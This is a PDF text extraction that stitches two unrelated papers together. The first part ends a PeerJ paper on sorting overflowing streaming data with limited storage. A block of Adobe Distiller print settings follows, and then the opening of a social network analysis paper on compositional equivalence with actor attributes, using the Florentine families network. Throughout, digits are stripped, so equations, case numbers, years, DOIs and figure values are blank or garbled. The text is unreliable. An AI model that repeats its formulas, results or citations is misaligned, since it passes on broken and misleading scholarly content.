in qi is jqij� ð Þ n�n . p ¼ �jqij � � n � n � n h � types or jqij � n � n � n h � type : >>< >>: ( ) case : da is in between two compact groups qi and qi + . the probability of case can be analyzed as that of case . case : da is in between a single number wj and a compact group qi. if qi is a type- compact group, then the probability that da is in qi is n�n . if qi is a type- compact group, then the probability that da is in qi is n�n . if qi is a type- compact group, then the probability that da is in qi is n�n . if qi is a type- compact group, then the probability that da is in qi is n�n . the probability of case can be analyzed as that of case . case : da is in between a compact group qi and a single number wk. the probability of case can be analyzed as that of case . case : da is in between two single numbers wj and wj + . the probability of case can be analyzed as that of case . note that the probability of all cases for the first input data chunk is written as follows. p ¼ jqij � � � n � n � n h � case ðtype or type Þ jqij � n � n � n h � case ðtype Þ n � n � n h � other cases >>>>>>< >>>>>>: ( ) after the first input data chunk, the probability of each case after m next input data chunks can be written in a generic form as follows. chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ p ¼ jqij � � � n � pmi¼ ni � n h � m case ðtype or type Þ jqij � n � pmi¼ ni � n h � m case ðtype Þ n � pmi¼ ni � n h � m other cases >>>>>>< >>>>>>: ( ) note that the value n � pmi¼ ni and nh � m will finally approach . this implies that the number of compact groups decreases and eventually there should be only one compact group. however, the time during which the probability approaches depends upon the value of h, as shown in fig. . if h is large, then the chance that an input chunk contains a tentative sorted sequence is also high. theorem the only possible existing case to be tested for the last incoming data chunk is case , case , case , case , case , or case . proof: the only probability approaching is the probability of case , case , case , case , case , and case as defined in eqs. ( ).▪ conclusion this study proposed a concrete concept and practical algorithm to sort streaming numbers in the case where the total numbers overflow the actual storage. no secondary storage is involved in this constraint. the size of the working storage, h, for sorting is fixed figure probability of cases , , , , and of data where h = . full-size doi: . /peerj-cs. /fig- chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ throughout the sorting event. the incoming numbers are captured by new proposed data architectures in the forms of sets of single numbers and compact groups of sorted numbers. the actual order of each number with respect to the total numbers, n, in the streaming sequence can be correctly retrieved within o(h). the time complexity of the proposed algorithm is o(n), and the space complexity is o(m). from the experiments, it was found that the proposed algorithm can correctly and stably handle the streaming data size of at least . times larger than the size of the working storage. furthermore, the sorted order obtained from the proposed algorithm is absolutely correct, no approximate order. in addition, each number can be directly retrieved from any compact group by its type. the analysis of dynamic change of used and unused working storage areas during the sorting process was also provided. although the proposed algorithm is primarily designed for a single processor, the proposed algorithm can be practically extended to be implemented on a multiprocessor architecture with a slight modification. in the case of a multiprocessor architecture, more than one chunk of data can simultaneously flow into the machine by one chunk per processor. the proposed algorithm can be deployed by each processor to sort each incoming chunk and to merge the final sorted results from all processors later. in fact, there are several real applications requiring this kind of sorting process where the data always overflow the working memory. some applications are the followings: . managing tremendous information inside large organizations by sorting transactions according to account numbers, locations of customers, date stamp, price or popularity of stock, zip code or address of mail, and so on (sedgewick & wayne, ). the proposed algorithm can reduce memory storage for keeping those data. . reducing the search time of huge streaming data by sorting the data first and representing them in compact groups as implemented in streaming data sort algorithm. . computing order statistics, quartile, decile, and percentile of big streaming data continuously flowing into an internet-scale network monitoring system and database query optimization (buragohain & suri, ). . checking duplicated data for fraud detection or fake social engagement activities such as bidding on an item, filling out a form, clicking an advertisement, or making a purchase (metwally, agrawal & el abbadi, ; li et al., ). even though the proposed streaming data sort successfully sorts the streaming data under the defined constraints but some of the following further studies of streaming data sorting based on other constraints can be pursued. . developing a new structure of compact group whose type can be adapted to any arbitrary different value of two temporal consecutive numbers. . extending the sorting concept to cope with various data types such as a character string or a floating point number which exist in other engineering, scientific, and business problems. chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding this work was supported by development and promotion of science and technology talents project (dpst) and thailand research fund under grant number rta . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: development and promotion of science and technology talents project (dpst). thailand research fund: rta . competing interests the authors declare that they have no competing interests. author contributions � suluk chaikhan conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � suphakant phimoltares conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � chidchanok lursinsap conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data, including permutations of random integers, are available at the uci repository (https://archive.ics.uci.edu/ml/datasets.php). specifically: - beijing pm . data data set: https://archive.ics.uci.edu/ml/datasets/beijing+pm . +data - census income data set: http://archive.ics.uci.edu/ml/datasets/census+income - covertype data set: https://archive.ics.uci.edu/ml/datasets/covertype - diabetes data set: https://archive.ics.uci.edu/ml//datasets/diabetes - pm . data of five chinese cities data set: https://archive.ics.uci.edu/ml/datasets/ pm . +data+of+five+chinese+cities - incident management process enriched event log data set: https://archive.ics.uci.edu/ml/datasets/incident+management+process+enriched+event+log - kegg metabolic relation network (directed) data set: https://archive.ics.uci.edu/ml/ datasets/kegg+metabolic+relation+network+(directed) chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://archive.ics.uci.edu/ml/datasets.php https://archive.ics.uci.edu/ml/datasets/beijing+pm . +data http://archive.ics.uci.edu/ml/datasets/census+income https://archive.ics.uci.edu/ml/datasets/covertype https://archive.ics.uci.edu/ml//datasets/diabetes https://archive.ics.uci.edu/ml/datasets/pm . +data+of+five+chinese+cities https://archive.ics.uci.edu/ml/datasets/pm . +data+of+five+chinese+cities https://archive.ics.uci.edu/ml/datasets/incident+management+process+enriched+event+log https://archive.ics.uci.edu/ml/datasets/kegg+metabolic+relation+network+(directed) https://archive.ics.uci.edu/ml/datasets/kegg+metabolic+relation+network+(directed) http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ - kegg metabolic reaction network (undirected) data set: https://archive.ics.uci.edu/ ml/datasets/kegg+metabolic+reaction+network+(undirected) - buzz in social media data set: https://archive.ics.uci.edu/ml/datasets/buzz+in+social +media+. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references agrawal a, sriram b. . concom sorting algorithm. in: th international conference on computer science and network technology. vol. . – . al-fuqaha a, guizani m, mohammadi m, aledhari m, ayyash m. . internet of things: a survey on enabling technologies, protocols, and applications. ieee communications surveys & tutorials ( ): – doi . /comst. . . babcock b, babu s, datar m, motwani r, widom j. . models and issues in data stream systems. in: proceedings of the twenty-first acm sigmod-sigact-sigart symposium on principles of database systems, pods ’ . new york, – . bey ahmed khernache m, laga a, boukhobza j. . montres-nvm: an external sorting algorithm for hybrid memory. in: ieee th non-volatile memory systems and applications symposium (nvmsa). piscataway: ieee, – . buragohain c, suri s. . quantiles on streams. in: encyclopedia of database systems. new york: springer-verlag us, – . cardenas a, manadhata p, rajan s. . big data analytics for security. ieee security & privacy ( ): – doi . /msp. . . cormen th, leiserson ce, rivest rl, stein c. . introduction to algorithms. third edition. cambridge: the mit press. dave m, gianey h. . different clustering algorithms for big data analytics: a review. in: international conference system modeling & advancement in research trends. – . dua d, graff c. . uci machine learning repository: school of information and computer science. irvine: university of california. elder m, goh yk. . permutations sorted by a finite and an infinite stack in series. in: international conference on language and automata theory and applications. – . farnoud f, yaakobi e, bruck j. . approximate sorting of data streams with limited storage. journal of combination optimization : – . faro s, marino fp, scafiti s. . fast-insertion-sort: a new family of efficient variants of the insertion-sort algorithm. in: sofsem (doctoral student research forum). – . franceschini g. . proximity mergesort: optimal in-place sorting in the cache-oblivious model. in: proceedings of the fifteenth annual acm-siam symposium on discrete algorithms, soda. vol. . new york: acm, – . gantz j, reinsel d. . the digital universe in : big data, bigger digital shadows, and biggest growth in the far east. idc iview: idc analyze the future ( ): – . goel s, kumar r. . brownian motus and clustered binary insertion sort methods: an efficient progress over traditional methods. future generation computer systems ( ): – doi . /j.future. . . . chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://archive.ics.uci.edu/ml/datasets/kegg+metabolic+reaction+network+(undirected) https://archive.ics.uci.edu/ml/datasets/kegg+metabolic+reaction+network+(undirected) https://archive.ics.uci.edu/ml/datasets/buzz+in+social+media+ https://archive.ics.uci.edu/ml/datasets/buzz+in+social+media+ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /comst. . http://dx.doi.org/ . /msp. . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ huang x, liu z, li j. . array sort: an adaptive sorting algorithm on multi-thread. journal of engineering ( ): – doi . /joe. . . idrizi f, rustemi a, dalipi f. . a new modified sorting algorithm: a comparison with state of the art. in: th mediterranean conference on embedded computing. – . kanza y, yaari h. . external sorting on flash storage: reducing cell wearing and increasing efficiency by avoiding intermediate writes. vldb journal ( ): – doi . /s - - - . katal a, wazid m, goudar r. . big data: issues, challenges, tools and good practices. in: sixth international conference on contemporary computing. – . kehoe b, patil s, abbeel p, goldberg k. . a survey of research on cloud robotics and automation. ieee transactions on automation science and engineering ( ): – . keim d, qu h, ma k-l. . big-data visualization. ieee computer graphics and applications ( ): – . laga a, boukhobza j, singhoff f, koskas m. . montres: merge on-the-run external sorting algorithm for large data volumes on ssd based storage systems. ieee transactions on computers ( ): – . lee y-s, quero lc, kim s-h, kim j-s, maeng s. . activesort: efficient external sorting using active ssds in the mapreduce framework. future generation computer systems : – . li y, martinez o, chen x, li y, hopcroft je. . in a world that counts: clustering and detecting fake social engagement at scale. republic and canton of geneva: international world wide web conferences steering committee. liang y, chen t, chang y, chen s, wei h, shih w. . b*-sort: enabling write-once sorting for non-volatile memory. in: ieee transactions on computer-aided design of integrated circuits and systems. piscataway: ieee. mehmood a, natgunanathan i, xiang y, hua g, guo s. . protection of big data privacy. ieee access : – . metwally a, agrawal d, el abbadi a. . duplicate detection in click streams. in: proceedings of the th international conference on world wide web. – . mohammed as, amrahov a e, Çelebi fv. . bidirectional conditional insertion sort algorithm; an efficient progress on the classical insertion sort. future generation computer systems : – . osama h, omar y, badr a. . mapping sorting algorithm. in: sai computing conference (sai). – . o’malley o. . terabyte sort on apache hadoop. available at http://sortbenchmark. org/yahoo- hadoop. sedgewick r, wayne k. . algorithms. boston: addison-wesley professional. singh h, sarmah m. . comparing rapid sort with some existing sorting algorithms. in: das k, deep k, pant m, bansal j, nagar a, eds. proceedings of fourth international conference on soft computing for problem solving: advances in intelligent systems and computing. vol. . new delhi: springer. tambouratzis t. . a novel artificial neural network for sorting. ieee transactions on systems, man, and cybernetics: part b ( ): – . thusoo a, shao z, anthony s, borthakur d, jain n, sarma j, murthy r, liu h. . data warehousing and analytics infrastructure at facebook. in: proceedings of the acm sigmod international conference on management of data, sigmod . – . chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /joe. . http://dx.doi.org/ . /s - - - http://sortbenchmark.org/yahoo-hadoop http://sortbenchmark.org/yahoo-hadoop http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ vatrapu r, mukkamala rr, hussain a, flesch b. . social set analysis: a set theoretical approach to big data analytics. ieee access : – . vignesh r, pradhan t. . merge sort enhanced in place sorting algorithm. in: international conference on advanced communication control and computing technologies (icaccct). – . witayangkurn a, horanont t, shibasaki r. . performance comparisons of spatial data processing techniques for a large scale mobile phone dataset. yiliang s, zhenghong y. . communication rules learning strategy in big data network based on svn neural network. in: international conference on intelligent transportation, big data & smart city. – . zhai c, zhang y, hu p. . modeling and analysis of material supply network based on big data packed with traffic. in: ieee rd international conference on cloud computing and big data analysis. piscataway: ieee, – . zhao c, chang h, liu q. . bayesian algorithm based traffic prediction of big data services in openflow controlled optical networks. in: ieee nd international conference on big data analysis (icbda). piscataway: ieee, – . chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ correct and stable sorting for overflow streaming data with a limited storage size and a uniprocessor introductions constraints definitions and notations concepts proposed algorithm experimental results and discussion conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice microsoft word - volume _final insna.org | issues & | volume | compositional equivalence with actor attributes: positional analysis of the florentine families network j. antonio rivero ostoic university of san simón cochabamba, bolivia abstract this paper extends compositional equivalence – which is a structural correspondence type intended for multiplex networks – by incorporating actor attributes in the modeling of the network relational structure as diagonal matrices. as an illustration, we construct the positional system of the florentine families network with business and marriage ties together with relevant characteristics acquired from the actors such as the families’ financial wealth and the number of priorates they held. different representations of the cumulated person hierarchies reveal that adding wealth to the modeling provides a more accurate picture of what the substantial narrative says about this network. author correspondence concerning this work should be addressed to antonio rivero ostoic phd, associate researcher, centro de estudios superiores, university of san simón, cochabamba, bolivia; rivero.antonio@gmail.com; github.com/mplex connections compositional equivalence | volume | issues & | insna.org . introduction relationships among actors in a defined collective scheme are the primary source of information for social network analysis. ties not only make the network structure but also provide the basis for the character- ization of underlying processes occurring in the social system. although social net- works are typically characterized by a sin- gle type of relationship, social life is more complex and people are embedded with ‘different’ kinds of ties that are interlocked within the network relational structure. these sorts of arrangements are known as multiplex networks, and the as- sociated relational structure of such social systems is typically reduced onto position- al systems to facilitate a useful substantial interpretation. a key issue in the reduction process is to preserve the multiplicity of the ties since the way different ties are in- tertwined provides important information about the network structure. in this spirit, breiger and pattison ( ) proposed a type of equivalence among the network members that is built on local role algebras for the creation of the positional system. the goal with this paper is to extend this type of correspond- ence by suggesting an effective way to in- corporate the attributes of the actors and their relationships into a single relational system representing the multiplex network structure. one important reason for such integration is that social conduct in net- works does not always institute a link be- tween individual subjects, and attribute- based information about the actors is often not ascribed to them, but depends on the individual’s own choices or circumstances. examples of actor attributes are the acquisition of a certain characteristic from the social environment such as innovation adoption; the acquisition of a certain atti- tude; the non-compulsory affiliation to a group; the individual’s personal wealth and political power, etc. such attributes can play a significant role in the network rela- tional structure and should be incorporated into the modeling process. . algebra for multiplex networks representing social relations and actor at- tributes in an integrated system requires a formal definition of the social network concept. a social network comprises a set of social actors, | is an actor , measured under a collec- tion of social relations , | ˈhas a tie toˈ with , being an ordered pair. a binary relation , represents a tie between actors and in , whereas , denotes the lack of a tie. the pairs on are stored in an adjacency matrix with size . a multiplex network is a collec- tion of different kinds of relations, , ,…, , measured over . in this case each relational type is stored in separate adjacency matrices , ,…, , which are stacked together into a single ar- ray with size . moreover, the actors and their ties are also represented by nodes and differentiated edges, respective- ly, in a graphical device called a multi- graph, in which the relational levels are depicted in parallel rather than being col- lapsed into bold edges representing multi- plex ties. each element in constitutes a generator tie that produces compound rela- tionships among the network members through relational composition, and com- pound ties can be concatenated as well. for instance, ‘the friend of a colleague’ comes from the generators ‘friend of’ and ‘col- league of’, etc. both generators and com- pounds are referred to as strings in rela- tional structures. . representation of attributes one of the theses of this paper is that non- ascribed attributes from the actors in the network can be an integrated part of the relational structure, which is typically represented by a semigroup of relations (boorman and white, ; pattison, ). in this sense, the incorporation of compositional equivalence connections insna.org | issues & | volume | the changing attributes of the actors implies that subjects sharing a characteristic constitute a subset of self- reflexive ties associated to the social system represented by a matrix format that can be combined with the other elements in the relational structure. in formal terms, actor attributes are represented by the elements of a diagonal matrix where each value is defined as: accordingly, for a given attribute defined in , and for , ,…, , the possible values of the first variable in the right-hand expression are: if the attribute is tied to actor otherwise on the other hand, is defined for nodes , , ,…, in by the delta function or kronecker delta as: for for as a result, the general representation of constitutes a diagonal matrix with the form: ⋯ ⋯ ⋮ ⋮ ⋱ ⋮ ⋯ that records as self-relationships the attributes of the total number of actors in the system. in other words, the ‘possession’ of the attribute produces a reflexive closure in the respective element of the system. the establishment of the indexed diagonal matrix implies that each type of attribute considered for the actors in the network is represented by its own array, and it constitutes an additional generator in the relational structure. when all network members share a given attribute, the result will be an identity matrix without any structural effect, whereas when none of the actors possesses the characteristic, the representation will be a null matrix with an annihilating effect where no composition is possible. clearly, we are mainly interested in the differentiation of the actors who share an attribute as opposed to those who do not share the trait because the resulting matrix that is neither a neutral nor an absorbing element in the algebraic structure has structuring consequences in the network relational system. . equivalence in multiplex networks although the concatenation of social ties used in the construction of the partial order structure is well established (boorman and white, ; pattison, ), there are caveats when producing algebraic systems with the diagonal matrices representing actor attributes. for instance, since social interactions are typically measured without loops and are represented by adjacency matrices with empty diagonals, these cannot be contained in an attribute relation with this form of representation. however, by grouping actors who are structurally equivalent, it is possible to obtain collective self-relations. for example, take relations c and a (and f) below. relation c has three maximally connected actors that make a clique configuration, but only a couple of them share attribute a. intrinsically, this means that the network of c relations includes system a and certainly not the other way around, but in the given example there is no such containment and it does not reflect the reality of this network. c f a a solution to this issue is to group the structurally equivalent actors in the network, which is the same as categorising actors with similar patterns of connections compositional equivalence | volume | issues & | insna.org relationships. for instance, it is obvious that actors and are structurally equivalent (according to the definition made by lorrain and white, ) because these actors are identically related with both social relations (c and f), and they even share the same attribute. as a result, the first two actors make up a single class and the associations in the system now echo the inclusion a c, thanks to the reflexive character of the first class of actors. c f a structural equivalence is the most stringent type of correspondence. since its formal definition significant relaxations have been proposed for social networks; notably automorphic equivalence (everett, ; winship and mandel, ), regular equivalence (sailer, ; white and reitz, ), and generalized equivalence (doreian et al., , ). a common characteristic among these correspondence types is that they have a global perspective because the standpoints of the entire set of actors within the social system are taken into account simultaneously in the modeling process. another distinctive feature of these equivalences is that they were originally designed for simple networks, and yet there is no formal treatment for multiple structures. while the grouping of the actors in social networks usually applies some relaxation to the equivalence criterion, in the case of multiplex networks it is desirable to preserve the multiplicity of the ties in the network reduction. although it is possible to collapse the different levels into multiplex ties and then apply a global equivalence as with simple networks, significant information gets lost by discarding the multiplicity of the ties. hence, in order to get a single structure representing a multiplex network, we need to combine the distinct particular levels of the relationship, which is feasible by considering the individual perspectives in the modeling. . local role equivalence as an alternative to a global equivalence in the reduction of multiplex networks, we can apply a local perspective in the type of correspondence to be used in the establishment of classes. this means that the standpoints of individual actors are taken separately rather than together in the definition of similarity among the network members in structural terms. in addition, the local equivalences available within social network analysis make it possible to consider not only the primitive relations at different levels but also the compound relations that go beyond the immediate neighbours of the actor. this is yet another difference compared to the global equivalence types. to recognize local equivalences among the actors we rely on a three- dimensional array similar to where the primitive ties of the network and compound relations are stacked together. a partially ordered structure by increasing relation, similar to the array shown in figure , has been proposed by winship and mandel ( ) for the definition of local equivalences. they called this device a relation-box. figure shows a shadowed horizontal ‘slice’ across the string relations for the outgoing ties of a single actor (the first one in this case), which reflects the actor’s activity linked to the rest of the members through the different string relations, both primitives and compounds, that are occurring in the network. a horizontal slice in the relation- box is called a relation plane, , and encodes the distinct primitive and compound relations that a single actor has with the rest of the network members. for each network member , there is a vector through the length of the relational plane representing a role relation, , ∗ , with actor and relation . the set of distinct role relations in this case defines compositional equivalence connections insna.org | issues & | volume | figure : relation-box with an emphasized relation plane and its role relations the role set of actor , and hence there is one role set for each actor from the network that is obtained when the duplicated role relations are removed (wasserman and faust, ; winship and mandel, ). a local role equivalence is also a way to characterize social roles in incomplete and in ego-centred networks while preserving the distinction of diverse types of relationships. besides, winship and mandel ( ) point out that local role equivalence is a generalisation of automorphic equivalence in the sense that both kinds of equivalence involve the same types of role relations. automorphic equivalence would require not only the same types of role relations but also the same number of such relations, which implies equal role sets and local role algebras among correspondent actors (pattison, ). although the relation-box theoretically permits consideration of compound relations of infinite lengths, the actors would not be aware of long chains of relations in their surrounding social environment. thus, based on practical or substantial reasons, it is possible to perform the analysis with a ‘truncated’ version of this array with size , where is the number of the different primitive and compound ties until a length that is pre-defined by the researcher. . compositional equivalence breiger and pattison ( ) developed one structural correspondence aimed at multiplex networks that is based on the individual perspectives of the actors. although this equivalence type is referred to in the literature as ‘ego algebra’ (wasserman and faust, ), we call it compositional equivalence (ce) since compound relations are taken into account. thus with ce the analysis of local roles uses the information expressed in the different relation planes of the relation- box corresponding to particular network members whose rows and columns represent – according to the authors – the dual structure of the actors and their relations. while such an approach connections compositional equivalence | volume | issues & | insna.org characterizes the local role equivalence type, there is a step forward from a local perspective in the equivalence definition since all the information from particular role relations is generalized to the entire network structure. the fact that ce generalizes local roles to the entire system implies that this type of correspondence works both at the local and at a ‘global’ level. that is, the establishment of roles and positions in the network are from the perspectives of individual actors, whereas the characterization of equivalence itself is made by considering the relational features that are common to all members in the network. however, this last feature works better with middle-sized networks, and hence ce can be regarded as a local to ‘middle-range’ type of correspondence (pattison, personal communication). the local portion of ce lies in the actors’ particular views of the system in terms of inclusions among the role relations of the actors’ immediate neighbours. recall that the role relations are recorded in the columns of the individual relational planes, which means that there are in total of these vectors in the network, one for each actor in every relation plane of size with string relations of length . isolated actors in a multiplex network are unable to ‘see’ any type of relationships among other actors through the defined links. this implies that role relations for isolates are empty no matter the type of tie or its length, and that any role relations in the relation plane are blank as well. however, connected actors have a different perspective where there is an inclusion among other actors. the collection of inclusions (or lack of them) for each actor or class is reflected in a square array size , called a person hierarchy, belonging to this entity. in more formal terms, from the standpoint of a given actor , actor is ‘contained within’ actor whenever there is a string between and , there is a same type of string between and (cf. breiger and pattison, , p. ). furthermore, the collection of all perceived inclusions in represents the person hierarchy , which is defined for actors , , ∈ and relation as: iff ∗ ∗ iff ∗ ≰ ∗ iff ∑ ∗ the last proposition implies that there is no inclusion between actors and in the person hierarchy of , and this is either due to the lack of containment among these actors or simply because actor has an empty role set. notice as well that there is a perceived containment among actors in a given relational plane in the case where their role relations are identical, i.e. ↔ ∗ ∗ . on the other hand, the global part of ce occurs with the union of the different personal hierarchies into a cumulated person hierarchy across actors. this means that is represented by a single square matrix of size having the properties of a partially ordered structure, namely reflexive, antisymmetric, and transitive. the structural information in the cumulated person hierarchy lays the foundations for categorizing the actors and performing a reduction of the network that – as breiger and pattison ( ) pointed out – comes from the zeros or the absence of inclusions among the different actors. the partition of the network itself is then a product of a global type of equivalence that is performed on the cumulated person hierarchy. however, we should bear in mind that matrix does not represent social ties as in , but constitutes a partial order structure indicating the lack of containments among the network members. hence, we assess classes of actors in the network according to their placement in such a graded system, which can be visualized through a lattice structure that is intended for partially ordered sets. in the next section we illustrate the process of constructing the local and global compositional equivalence connections insna.org | issues & | volume | hierarchies in detail with an example of the reduction of a multiplex network. as in breiger and pattison ( ), we study the florentine families network classic dataset and, like the authors, we apply ce in the reduction of this social system. . florentine families network the florentine families network dataset (breiger and pattison, ; kent, ; padgett and ansell, ) corresponds to a group of people from florence who had a leading role in the creation of the modern banking system in early th-century europe. there are two types of social ties in the network that correspond to business and marriage relations among the prominent florentine families, two of which stand out as being particularly powerful and rivals: the medici and the strozzi. the ties of this network are undirected, which does not represent any problem for the marriage ties but is unfortunate for the business relations: a circumstance that was remedied by breiger and pattison ( ) in their analysis by including measures of power such as families’ wealth and the number of priorates they held. figure depicts the network as a multigraph where different shapes in the edges represent the two kinds of relations. we note in the picture that eight bonds combine business and marriage ties in the system and that the network has one component and a single isolated actor represented by the pucci family. a force- directed layout algorithm (fruchterman and reingold, ) has been applied to the graph to avoid crossing edges and also to group together closely related actors. the visualisation gives us initial insights into the general social structure where actors are linked; however, we need to implement some computations in case we want to look at the network relational structure in a form where the different data was retrieved from http://moreno.ss.uci.edu/data#padgett types of tie are interrelated. a crucial part of the modelling of multiplex networks is the reduction of the social system because the corresponding relational structure represented by the semigroup is typically large and complex, even for small arrangements. for instance, breiger and pattison ( , p. ) report a semigroup size with an order of for the florentine families network, and this is only considering the two generator relations without attributes. certainly, it is necessary to work with a more manageable structure in order to obtain better insights into its logic of interlock. the reduction of the network implies constructing a relational structure based on a system of roles and positions, which leads to the role structure of the network. thanks to its reduced size, the network role structure is typically a more convenient configuration for a substantial interpretation of the multiplex network structure than the ‘raw’ relational arrangement of the system. a key aspect in the creation of the role structure is to preserve the multiplicity of the ties, and we know that local role equivalences allow us to combine different levels in the relationships. next, we categorize the actors in the florentine families network in terms of ce having actor attributes as generator relations. the first step is to look at the structure 